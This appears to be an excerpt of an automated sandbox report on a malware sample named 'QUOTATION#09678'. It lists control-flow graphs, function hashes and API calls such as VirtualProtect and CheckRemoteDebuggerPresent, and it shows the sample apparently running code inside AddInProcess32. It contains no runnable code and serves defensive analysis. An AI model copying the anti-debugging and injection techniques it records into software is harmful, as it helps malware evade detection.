                                                control_flow_graph 1694 7ffd9b88ba11-7ffd9b88ba4b 1695 7ffd9b88badc-7ffd9b88baef 1694->1695 1696 7ffd9b88ba51-7ffd9b88ba96 call 7ffd9b88aaf0 call 7ffd9b886fb0 1694->1696 1701 7ffd9b88bb31-7ffd9b88bb34 1695->1701 1702 7ffd9b88baf1-7ffd9b88bb09 1695->1702 1696->1695 1708 7ffd9b88ba98-7ffd9b88bab6 1696->1708 1703 7ffd9b88bb35-7ffd9b88bb51 1701->1703 1704 7ffd9b88bbd6-7ffd9b88bbe7 1701->1704 1707 7ffd9b88bb53-7ffd9b88bb6a call 7ffd9b886fb0 call 7ffd9b887710 1702->1707 1709 7ffd9b88bb0b-7ffd9b88bb2f 1702->1709 1703->1707 1714 7ffd9b88bc29-7ffd9b88bc36 1704->1714 1715 7ffd9b88bbe9-7ffd9b88bbf9 1704->1715 1707->1704 1723 7ffd9b88bb6c-7ffd9b88bb7e 1707->1723 1708->1695 1712 7ffd9b88bab8-7ffd9b88badb 1708->1712 1709->1701 1718 7ffd9b88bc3c-7ffd9b88bc4f 1714->1718 1719 7ffd9b88bcd3-7ffd9b88bce1 1714->1719 1717 7ffd9b88bbfa 1715->1717 1721 7ffd9b88bbfb-7ffd9b88bc09 1717->1721 1722 7ffd9b88bc53-7ffd9b88bc75 call 7ffd9b88aaf0 1718->1722 1729 7ffd9b88bce6-7ffd9b88bcf8 1719->1729 1730 7ffd9b88bce3-7ffd9b88bce5 1719->1730 1721->1722 1728 7ffd9b88bc0b-7ffd9b88bc0e 1721->1728 1722->1719 1736 7ffd9b88bc77-7ffd9b88bc7b 1722->1736 1723->1717 1732 7ffd9b88bb80 1723->1732 1733 7ffd9b88bc12-7ffd9b88bc28 1728->1733 1734 7ffd9b88bcfa-7ffd9b88bd04 1729->1734 1735 7ffd9b88bc7d-7ffd9b88bc89 1729->1735 1730->1729 1738 7ffd9b88bbc6-7ffd9b88bbd5 1732->1738 1739 7ffd9b88bb82-7ffd9b88bb8a 1732->1739 1733->1714 1741 7ffd9b88bd05-7ffd9b88bd09 1734->1741 1735->1741 1742 7ffd9b88bc8b 1735->1742 1736->1735 1739->1721 1743 7ffd9b88bb8c-7ffd9b88bb91 1739->1743 1747 7ffd9b88bd0b-7ffd9b88bd36 1741->1747 1748 7ffd9b88bd53-7ffd9b88bd93 call 7ffd9b88aaf0 * 2 call 7ffd9b886fb0 1741->1748 1744 7ffd9b88bc8d-7ffd9b88bcab call 7ffd9b887350 1742->1744 1745 7ffd9b88bcd1-7ffd9b88bcd2 1742->1745 1743->1733 1746 7ffd9b88bb93-7ffd9b88bbb4 call 7ffd9b887350 1743->1746 1744->1719 1758 7ffd9b88bcad-7ffd9b88bcd0 1744->1758 1746->1704 1760 7ffd9b88bbb6-7ffd9b88bbc4 1746->1760 1749 7ffd9b88be2c-7ffd9b88be3f 1747->1749 1750 7ffd9b88bd3c-7ffd9b88bd50 1747->1750 1748->1749 1774 7ffd9b88bd99-7ffd9b88bdbd 1748->1774 1762 7ffd9b88be81 1749->1762 1763 7ffd9b88be41-7ffd9b88be56 1749->1763 1750->1748 1758->1745 1760->1738 1764 7ffd9b88be82-7ffd9b88be89 1762->1764 1766 7ffd9b88be58-7ffd9b88be6e 1763->1766 1767 7ffd9b88be8b-7ffd9b88be8e 1763->1767 1764->1767 1766->1764 1771 7ffd9b88be70-7ffd9b88be80 1766->1771 1768 7ffd9b88be90-7ffd9b88bea0 1767->1768 1769 7ffd9b88bea2-7ffd9b88beae 1767->1769 1772 7ffd9b88bebe-7ffd9b88bec7 1768->1772 1769->1772 1773 7ffd9b88beb0-7ffd9b88bebb 1769->1773 1771->1772 1775 7ffd9b88bf38-7ffd9b88bf45 1772->1775 1776 7ffd9b88bec9-7ffd9b88becb 1772->1776 1773->1772 1778 7ffd9b88bf47-7ffd9b88bf5a 1775->1778 1776->1778 1779 7ffd9b88becd 1776->1779 1782 7ffd9b88bf61-7ffd9b88bf93 call 7ffd9b88aaf0 call 7ffd9b886fb0 1778->1782 1783 7ffd9b88bf5c call 7ffd9b88aaf0 1778->1783 1780 7ffd9b88becf-7ffd9b88bee7 call 7ffd9b887350 1779->1780 1781 7ffd9b88bf13-7ffd9b88bf37 1779->1781 1780->1781 1784 7ffd9b88c099-7ffd9b88c0ca 1781->1784 1785 7ffd9b88bf3d-7ffd9b88bf5c call 7ffd9b88aaf0 1781->1785 1782->1784 1798 7ffd9b88bf99-7ffd9b88bfe2 1782->1798 1783->1782 1796 7ffd9b88c0cc-7ffd9b88c0f7 1784->1796 1797 7ffd9b88c114-7ffd9b88c156 call 7ffd9b88aaf0 * 2 call 7ffd9b886fb0 1784->1797 1785->1782 1799 7ffd9b88c0fd-7ffd9b88c113 1796->1799 1800 7ffd9b88c28e-7ffd9b88c2e3 1796->1800 1797->1800 1822 7ffd9b88c15c-7ffd9b88c17a 1797->1822 1808 7ffd9b88c063-7ffd9b88c06f 1798->1808 1809 7ffd9b88bfe4-7ffd9b88c016 call 7ffd9b887350 1798->1809 1799->1797 1817 7ffd9b88c3b6-7ffd9b88c3c1 1800->1817 1818 7ffd9b88c2e9-7ffd9b88c33e call 7ffd9b88aaf0 * 2 call 7ffd9b886fb0 1800->1818 1808->1784 1814 7ffd9b88c071-7ffd9b88c098 1808->1814 1809->1784 1820 7ffd9b88c01c-7ffd9b88c060 call 7ffd9b88b4c0 1809->1820 1829 7ffd9b88c3c6-7ffd9b88c40b 1817->1829 1830 7ffd9b88c3c3-7ffd9b88c3c5 1817->1830 1818->1817 1858 7ffd9b88c340-7ffd9b88c36b 1818->1858 1820->1808 1822->1800 1826 7ffd9b88c180-7ffd9b88c19a 1822->1826 1827 7ffd9b88c19c-7ffd9b88c19f 1826->1827 1828 7ffd9b88c1f3 1826->1828 1833 7ffd9b88c220-7ffd9b88c262 call 7ffd9b88b4c0 1827->1833 1834 7ffd9b88c1a1-7ffd9b88c1ba 1827->1834 1837 7ffd9b88c1f5-7ffd9b88c1fa 1828->1837 1838 7ffd9b88c264 1828->1838 1835 7ffd9b88c495-7ffd9b88c4a7 1829->1835 1836 7ffd9b88c411-7ffd9b88c451 call 7ffd9b88aaf0 call 7ffd9b886fb0 1829->1836 1830->1829 1833->1838 1840 7ffd9b88c1d5-7ffd9b88c1e7 1834->1840 1841 7ffd9b88c1bc-7ffd9b88c1d3 1834->1841 1854 7ffd9b88c4e9-7ffd9b88c518 call 7ffd9b887d80 1835->1854 1855 7ffd9b88c4a9-7ffd9b88c4e7 1835->1855 1836->1835 1865 7ffd9b88c453-7ffd9b88c481 call 7ffd9b888418 1836->1865 1843 7ffd9b88c27b-7ffd9b88c28d 1837->1843 1844 7ffd9b88c1fc-7ffd9b88c21b call 7ffd9b887350 1837->1844 1838->1800 1847 7ffd9b88c266-7ffd9b88c279 1838->1847 1849 7ffd9b88c1eb-7ffd9b88c1f1 1840->1849 1841->1849 1844->1833 1847->1843 1849->1828 1869 7ffd9b88c579-7ffd9b88c5bd 1854->1869 1870 7ffd9b88c51a-7ffd9b88c55e 1854->1870 1855->1854 1862 7ffd9b88c3aa-7ffd9b88c3b5 1858->1862 1863 7ffd9b88c36d-7ffd9b88c37f 1858->1863 1863->1817 1866 7ffd9b88c381-7ffd9b88c3a7 1863->1866 1873 7ffd9b88c483-7ffd9b88c494 1865->1873 1866->1862 1878 7ffd9b88c5da-7ffd9b88c5dc 1869->1878 1879 7ffd9b88c5bf-7ffd9b88c5d8 1869->1879 1882 7ffd9b88c659 1870->1882 1881 7ffd9b88c5df-7ffd9b88c5ec 1878->1881 1879->1881 1885 7ffd9b88c5ee-7ffd9b88c60b 1881->1885 1886 7ffd9b88c651-7ffd9b88c656 1881->1886 1883 7ffd9b88c65b-7ffd9b88c663 1882->1883 1887 7ffd9b88c669-7ffd9b88c66f 1883->1887 1888 7ffd9b88c563-7ffd9b88c56e 1883->1888 1885->1883 1894 7ffd9b88c60d-7ffd9b88c64c call 7ffd9b889290 1885->1894 1886->1882 1890 7ffd9b88c670-7ffd9b88c6b7 1888->1890 1891 7ffd9b88c574-7ffd9b88c575 1888->1891 1891->1869 1894->1886
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b741bcf25128a5e7f23a69a6d1be3261123ce31d5e6c8275856431a548cd15e9
                                                • Instruction ID: 7308a8447c1c32a2202ecd55bbdb514ed83921461c35aafd34d279c44420d408
                                                • Opcode Fuzzy Hash: b741bcf25128a5e7f23a69a6d1be3261123ce31d5e6c8275856431a548cd15e9
                                                • Instruction Fuzzy Hash: FEA2473060DB4A4FE729DB28C4A44B5B7E1FF89300B1545BED49AC72B6DE39E946CB40
                                                Function 00007FFD9B888E18 Relevance: .9, Instructions: 924COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1925 7ffd9b888e18-7ffd9b88ce45 1927 7ffd9b88ce47-7ffd9b88ce88 1925->1927 1928 7ffd9b88ce8f-7ffd9b88ceb9 1925->1928 1930 7ffd9b88ce8e 1927->1930 1931 7ffd9b88cebb-7ffd9b88ced0 1928->1931 1932 7ffd9b88ced2 1928->1932 1930->1928 1933 7ffd9b88ced4-7ffd9b88ced9 1931->1933 1932->1933 1935 7ffd9b88cfd6-7ffd9b88cff6 1933->1935 1936 7ffd9b88cedf-7ffd9b88ceee 1933->1936 1938 7ffd9b88d047-7ffd9b88d052 1935->1938 1940 7ffd9b88cef8-7ffd9b88cef9 1936->1940 1941 7ffd9b88cef0-7ffd9b88cef6 1936->1941 1942 7ffd9b88cff8-7ffd9b88cffe 1938->1942 1943 7ffd9b88d054-7ffd9b88d063 1938->1943 1946 7ffd9b88cefb-7ffd9b88cf0c 1940->1946 1941->1946 1944 7ffd9b88d4c2-7ffd9b88d4da 1942->1944 1945 7ffd9b88d004-7ffd9b88d025 call 7ffd9b888df8 1942->1945 1950 7ffd9b88d065-7ffd9b88d077 1943->1950 1951 7ffd9b88d079 1943->1951 1955 7ffd9b88d4dc-7ffd9b88d517 call 7ffd9b888b90 1944->1955 1956 7ffd9b88d524-7ffd9b88d539 call 7ffd9b883f88 1944->1956 1966 7ffd9b88d02a-7ffd9b88d044 1945->1966 1953 7ffd9b88cf65 1946->1953 1954 7ffd9b88cf0e-7ffd9b88cf1e 1946->1954 1957 7ffd9b88d07b-7ffd9b88d080 1950->1957 1951->1957 1958 7ffd9b88cfb5-7ffd9b88cfbf 1953->1958 1959 7ffd9b88cf67-7ffd9b88cf70 1953->1959 1961 7ffd9b88cf73-7ffd9b88cf7e 1954->1961 2007 7ffd9b88d519-7ffd9b88d522 1955->2007 2008 7ffd9b88d561-7ffd9b88d56b 1955->2008 1987 7ffd9b88d53e-7ffd9b88d551 1956->1987 1962 7ffd9b88d086-7ffd9b88d0a8 call 7ffd9b888df8 1957->1962 1963 7ffd9b88d10c-7ffd9b88d120 1957->1963 1972 7ffd9b88cfc6-7ffd9b88cfd1 call 7ffd9b888390 1958->1972 1959->1961 1964 7ffd9b88cf20-7ffd9b88cf26 1961->1964 1965 7ffd9b88cf80-7ffd9b88cf97 1961->1965 1998 7ffd9b88d0d6-7ffd9b88d0d7 1962->1998 1999 7ffd9b88d0aa-7ffd9b88d0d4 1962->1999 1968 7ffd9b88d170-7ffd9b88d17f 1963->1968 1969 7ffd9b88d122-7ffd9b88d128 1963->1969 1964->1944 1971 7ffd9b88cf2c-7ffd9b88cf5d call 7ffd9b888df8 1964->1971 1965->1972 1985 7ffd9b88cf99-7ffd9b88cfb0 call 7ffd9b888df8 1965->1985 1966->1938 1992 7ffd9b88d18c 1968->1992 1993 7ffd9b88d181-7ffd9b88d18a 1968->1993 1975 7ffd9b88d147-7ffd9b88d15f 1969->1975 1976 7ffd9b88d12a-7ffd9b88d145 1969->1976 1971->1953 1972->1963 1991 7ffd9b88d168-7ffd9b88d16b 1975->1991 1976->1975 1985->1958 2003 7ffd9b88d55c-7ffd9b88d55f 1987->2003 2004 7ffd9b88d553-7ffd9b88d55b 1987->2004 2000 7ffd9b88d318-7ffd9b88d374 1991->2000 1994 7ffd9b88d18e-7ffd9b88d193 1992->1994 1993->1994 2005 7ffd9b88d199-7ffd9b88d19c 1994->2005 2006 7ffd9b88d49f-7ffd9b88d4a0 1994->2006 2010 7ffd9b88d0d9-7ffd9b88d0e0 1998->2010 1999->2010 2047 7ffd9b88d376-7ffd9b88d3cd call 7ffd9b883ec0 2000->2047 2048 7ffd9b88d3e4-7ffd9b88d3f8 2000->2048 2003->2008 2004->2003 2013 7ffd9b88d19e-7ffd9b88d1bb call 7ffd9b8801b8 2005->2013 2014 7ffd9b88d1e4 2005->2014 2017 7ffd9b88d4a3-7ffd9b88d4b2 2006->2017 2007->1956 2015 7ffd9b88d576-7ffd9b88d587 2008->2015 2016 7ffd9b88d56d-7ffd9b88d575 2008->2016 2010->1963 2019 7ffd9b88d0e2-7ffd9b88d107 call 7ffd9b888e20 2010->2019 2013->2014 2049 7ffd9b88d1bd-7ffd9b88d1e2 2013->2049 2025 7ffd9b88d1e6-7ffd9b88d1eb 2014->2025 2022 7ffd9b88d589-7ffd9b88d591 2015->2022 2023 7ffd9b88d592-7ffd9b88d5cd 2015->2023 2016->2015 2030 7ffd9b88d4b3-7ffd9b88d4bb 2017->2030 2034 7ffd9b88d48e-7ffd9b88d49e 2019->2034 2022->2023 2036 7ffd9b88d5d4-7ffd9b88d5df 2023->2036 2037 7ffd9b88d5cf call 7ffd9b88aaf0 2023->2037 2031 7ffd9b88d2ec-7ffd9b88d30f 2025->2031 2032 7ffd9b88d1f1-7ffd9b88d1fd 2025->2032 2030->1944 2040 7ffd9b88d315-7ffd9b88d316 2031->2040 2032->1944 2038 7ffd9b88d203-7ffd9b88d212 2032->2038 2052 7ffd9b88d5f1 2036->2052 2053 7ffd9b88d5e1-7ffd9b88d5ef 2036->2053 2037->2036 2043 7ffd9b88d225-7ffd9b88d232 call 7ffd9b8801b8 2038->2043 2044 7ffd9b88d214-7ffd9b88d223 2038->2044 2040->2000 2057 7ffd9b88d238-7ffd9b88d23e 2043->2057 2044->2057 2089 7ffd9b88d43e-7ffd9b88d443 2047->2089 2090 7ffd9b88d3cf-7ffd9b88d3d3 2047->2090 2055 7ffd9b88d447-7ffd9b88d453 call 7ffd9b886fb0 2048->2055 2056 7ffd9b88d3fa-7ffd9b88d425 call 7ffd9b883ec0 2048->2056 2049->2025 2059 7ffd9b88d5f3-7ffd9b88d5f8 2052->2059 2053->2059 2061 7ffd9b88d454-7ffd9b88d46c 2055->2061 2078 7ffd9b88d42a-7ffd9b88d432 2056->2078 2062 7ffd9b88d240-7ffd9b88d26d 2057->2062 2063 7ffd9b88d273-7ffd9b88d278 2057->2063 2064 7ffd9b88d5fa-7ffd9b88d60d call 7ffd9b882f50 2059->2064 2065 7ffd9b88d60f-7ffd9b88d617 call 7ffd9b883ed8 2059->2065 2061->1944 2068 7ffd9b88d46e-7ffd9b88d47e 2061->2068 2062->2063 2063->1944 2071 7ffd9b88d27e-7ffd9b88d29e 2063->2071 2079 7ffd9b88d61c-7ffd9b88d623 2064->2079 2065->2079 2074 7ffd9b88d480-7ffd9b88d48b 2068->2074 2082 7ffd9b88d2a0-7ffd9b88d2ac 2071->2082 2083 7ffd9b88d2b2-7ffd9b88d2e2 call 7ffd9b888880 2071->2083 2074->2034 2078->2017 2084 7ffd9b88d434-7ffd9b88d437 2078->2084 2082->2083 2094 7ffd9b88d2e7-7ffd9b88d2ea 2083->2094 2084->2030 2087 7ffd9b88d439 2084->2087 2087->2074 2091 7ffd9b88d43b 2087->2091 2089->2055 2090->2061 2093 7ffd9b88d3d5-7ffd9b88d3df 2090->2093 2091->2089 2094->2000
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d816ea618cfb0b6a0a78927af9ef568c9de100599f14a1ca4805dbaefb9aec18
                                                • Instruction ID: 1fcb6425dea2e223265acecfa4b8500000f9bdc3d0ea1f2283d79785ef6911e3
                                                • Opcode Fuzzy Hash: d816ea618cfb0b6a0a78927af9ef568c9de100599f14a1ca4805dbaefb9aec18
                                                • Instruction Fuzzy Hash: 7352C430B09A0D4FDB68EB68D865A7977E1FF59300B1501BEE45EC72A2DE34ED428B41
                                                Function 00007FFD9B88B630 Relevance: .4, Instructions: 387COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b27582cea2bf5997bd92132d5e546927474dc5bb9fac9cf91aea24a6cfaaeab
                                                • Instruction ID: 08ae9af20ccfeb4f97814a1b653f01a3f5cdf901398a8dafc06c388b77d1f7d4
                                                • Opcode Fuzzy Hash: 0b27582cea2bf5997bd92132d5e546927474dc5bb9fac9cf91aea24a6cfaaeab
                                                • Instruction Fuzzy Hash: 72C16930A0DF9A4FE329CB2588A5171B7E1FFD9301B15467ED4E6C32B2DA38A546C781
                                                Function 00007FFD9B894589 Relevance: .2, Instructions: 189COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 487450319c019740a676d631b622d824ca9a87eee6964fec6d74ccd04a6d3d75
                                                • Instruction ID: 1753035d4118c82a366cf0afb9d5cadec04d8c5793763c71a5563358830a59d5
                                                • Opcode Fuzzy Hash: 487450319c019740a676d631b622d824ca9a87eee6964fec6d74ccd04a6d3d75
                                                • Instruction Fuzzy Hash: FB516E31B0D74D0FD71E9B7898211A57BE1EB87310B0582BFD48AC71E7EC24594683C2
                                                Function 00007FFD9B88267A Relevance: 1.6, APIs: 1, Instructions: 145memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1439 7ffd9b88267a-7ffd9b882687 1440 7ffd9b882692-7ffd9b8826a3 1439->1440 1441 7ffd9b882689-7ffd9b882691 1439->1441 1442 7ffd9b8826ae-7ffd9b882769 VirtualProtect 1440->1442 1443 7ffd9b8826a5-7ffd9b8826ad 1440->1443 1441->1440 1448 7ffd9b882771-7ffd9b8827a2 1442->1448 1449 7ffd9b88276b 1442->1449 1443->1442 1449->1448
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 250be337f0419e1e2da5afbbb765548780919b51f95afeb2c50e728497802117
                                                • Instruction ID: 0a07eba3632ed0835d41e3e165648090c5f15f0b41602634faea118788389412
                                                • Opcode Fuzzy Hash: 250be337f0419e1e2da5afbbb765548780919b51f95afeb2c50e728497802117
                                                • Instruction Fuzzy Hash: AF412A3190DB884FD719DBA898166E97FE0EF56321F0443AFE099C3193DE7468068792
                                                Function 00007FFD9B880ED1 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1451 7ffd9b880ed1-7ffd9b880edd 1452 7ffd9b880ee0-7ffd9b880f2a 1451->1452 1453 7ffd9b880edf 1451->1453 1454 7ffd9b880f2c-7ffd9b880fac FreeConsole 1452->1454 1455 7ffd9b880ec7-7ffd9b880ece 1452->1455 1453->1452 1459 7ffd9b880fb4-7ffd9b880fdb 1454->1459 1460 7ffd9b880fae 1454->1460 1460->1459
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897616193.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID: ConsoleFree
                                                • String ID:
                                                • API String ID: 771614528-0
                                                • Opcode ID: ccd3ee22c8a245e81359aa50ee6076ce04b26a50c09f119336cb8bca7177883c
                                                • Instruction ID: a5e0984d4c3495ba5dfec05b192eaec4334b5de8310b4f9d7427ef2d464f337d
                                                • Opcode Fuzzy Hash: ccd3ee22c8a245e81359aa50ee6076ce04b26a50c09f119336cb8bca7177883c
                                                • Instruction Fuzzy Hash: EA41F33050E7C84FDB26DBA89855AE67FF0EF47220F0541AFD089C71A3C669540ACB52
                                                Function 00007FFD9B9510C9 Relevance: .3, Instructions: 253COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897842808.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b950000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9fde5b597bb2205e6f0aa2bce7ee8d9a1b781e531d6f64633278b460e5338eb
                                                • Instruction ID: 665f5c37f3e024e86fa769300032363b19190ed0c19925ab723d495172002799
                                                • Opcode Fuzzy Hash: a9fde5b597bb2205e6f0aa2bce7ee8d9a1b781e531d6f64633278b460e5338eb
                                                • Instruction Fuzzy Hash: D5714A31A1EB8D4FDB66DBA8C8755A83BE0EF55304B0601FBD44AC71A3DE68AD41C381
                                                Function 00007FFD9B950A04 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1897842808.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd9b950000_QUOTATION#09678.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7211e87d626800b1dc3e14ad6ff40056276e48a84f9872eaea4c08e0465295c2
                                                • Instruction ID: 8ac3b1f8b0d3257754b151a7f8d6e0d49dc77af9ef07f9b1548fbadf9714e908
                                                • Opcode Fuzzy Hash: 7211e87d626800b1dc3e14ad6ff40056276e48a84f9872eaea4c08e0465295c2
                                                • Instruction Fuzzy Hash: F8E0E530A056298ADB64DB48D841BE9B3B1EB88200F0041E5D55DA7251CB306A848B42

                                                Execution Graph

                                                Execution Coverage:11.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:100%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph 35787 2ca7e88 35788 2ca7ecc CheckRemoteDebuggerPresent 35787->35788 35789 2ca7f0e 35788->35789

                                                Executed Functions

                                                Function 06A759B0 Relevance: 9.0, Strings: 6, Instructions: 1482COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                • API String ID: 0-1342094364
                                                • Opcode ID: 5aae0cf3cc8f94db806501145c999bd6063549975117136348efa00d3048ebda
                                                • Instruction ID: 4bdc80b178df4006757c681247a4dad69b47c3880b67e307f2e532039b119628
                                                • Opcode Fuzzy Hash: 5aae0cf3cc8f94db806501145c999bd6063549975117136348efa00d3048ebda
                                                • Instruction Fuzzy Hash: 65D22834E10605CFDB64EF64C984B9DB7F2EF89310F6485A9D409AB265EB34ED85CB80
                                                Function 06A70040 Relevance: 3.0, Instructions: 3007COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36470a415b3b60708e7c529186ebabd61be32ca352a117823dbb221bd58af2f1
                                                • Instruction ID: 3ef73cbcfb983088c01f2aa42e300bc5ddd0e7f1d89c10e0c92d1f9aa1ab8470
                                                • Opcode Fuzzy Hash: 36470a415b3b60708e7c529186ebabd61be32ca352a117823dbb221bd58af2f1
                                                • Instruction Fuzzy Hash: 67630B31D10B1A8ACB55EF68C880699F7B1FF99300F15D79AE4587B125FB70AAC4CB81
                                                Function 06A7B390 Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1678 6a7b390-6a7b3ae 1679 6a7b3b0-6a7b3b3 1678->1679 1680 6a7b3d6-6a7b3d9 1679->1680 1681 6a7b3b5-6a7b3d1 1679->1681 1682 6a7b3e6-6a7b3e9 1680->1682 1683 6a7b3db-6a7b3e5 1680->1683 1681->1680 1684 6a7b3eb-6a7b405 1682->1684 1685 6a7b40a-6a7b40d 1682->1685 1684->1685 1687 6a7b424-6a7b426 1685->1687 1688 6a7b40f-6a7b41d 1685->1688 1691 6a7b42d-6a7b430 1687->1691 1692 6a7b428 1687->1692 1693 6a7b436-6a7b44c 1688->1693 1696 6a7b41f 1688->1696 1691->1679 1691->1693 1692->1691 1698 6a7b667-6a7b671 1693->1698 1699 6a7b452-6a7b45b 1693->1699 1696->1687 1700 6a7b672-6a7b678 1699->1700 1701 6a7b461-6a7b47e 1699->1701 1704 6a7b67a-6a7b6a7 1700->1704 1705 6a7b6f9 1700->1705 1710 6a7b654-6a7b661 1701->1710 1711 6a7b484-6a7b4ac 1701->1711 1709 6a7b6a9-6a7b6ac 1704->1709 1707 6a7b6fd-6a7b6ff 1705->1707 1708 6a7b6fb 1705->1708 1712 6a7b709-6a7b70d 1707->1712 1708->1712 1713 6a7b6cf-6a7b6d2 1709->1713 1714 6a7b6ae-6a7b6ca 1709->1714 1710->1698 1710->1699 1711->1710 1737 6a7b4b2-6a7b4bb 1711->1737 1717 6a7b70f-6a7b719 1712->1717 1718 6a7b71b 1712->1718 1715 6a7b77f-6a7b782 1713->1715 1716 6a7b6d8-6a7b6e4 1713->1716 1714->1713 1720 6a7b9b7-6a7b9b9 1715->1720 1721 6a7b788-6a7b797 1715->1721 1726 6a7b6ef-6a7b6f1 1716->1726 1723 6a7b720-6a7b722 1717->1723 1718->1723 1727 6a7b9c0-6a7b9c3 1720->1727 1728 6a7b9bb 1720->1728 1735 6a7b7b6-6a7b7fa 1721->1735 1736 6a7b799-6a7b7b4 1721->1736 1724 6a7b724-6a7b727 1723->1724 1725 6a7b739-6a7b772 1723->1725 1729 6a7b9c9-6a7b9d2 1724->1729 1725->1721 1755 6a7b774-6a7b77e 1725->1755 1726->1712 1731 6a7b6f3 1726->1731 1727->1709 1727->1729 1728->1727 1731->1705 1743 6a7b800-6a7b811 1735->1743 1744 6a7b98b-6a7b9a0 1735->1744 1736->1735 1737->1700 1738 6a7b4c1-6a7b4dd 1737->1738 1746 6a7b4e3-6a7b50d 1738->1746 1747 6a7b642-6a7b64e 1738->1747 1753 6a7b817-6a7b834 1743->1753 1754 6a7b976-6a7b985 1743->1754 1744->1720 1761 6a7b513-6a7b53b 1746->1761 1762 6a7b638-6a7b63d 1746->1762 1747->1710 1747->1737 1753->1754 1763 6a7b83a-6a7b930 call 6a797b8 1753->1763 1754->1743 1754->1744 1761->1762 1769 6a7b541-6a7b56f 1761->1769 1762->1747 1812 6a7b932-6a7b93c 1763->1812 1813 6a7b93e 1763->1813 1769->1762 1774 6a7b575-6a7b57e 1769->1774 1774->1762 1776 6a7b584-6a7b5b6 1774->1776 1784 6a7b5c1-6a7b5dd 1776->1784 1785 6a7b5b8-6a7b5bc 1776->1785 1784->1747 1787 6a7b5df-6a7b636 call 6a797b8 1784->1787 1785->1762 1786 6a7b5be 1785->1786 1786->1784 1787->1747 1814 6a7b943-6a7b945 1812->1814 1813->1814 1814->1754 1815 6a7b947-6a7b94c 1814->1815 1816 6a7b94e-6a7b958 1815->1816 1817 6a7b95a 1815->1817 1818 6a7b95f-6a7b961 1816->1818 1817->1818 1818->1754 1819 6a7b963-6a7b96f 1818->1819 1819->1754
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
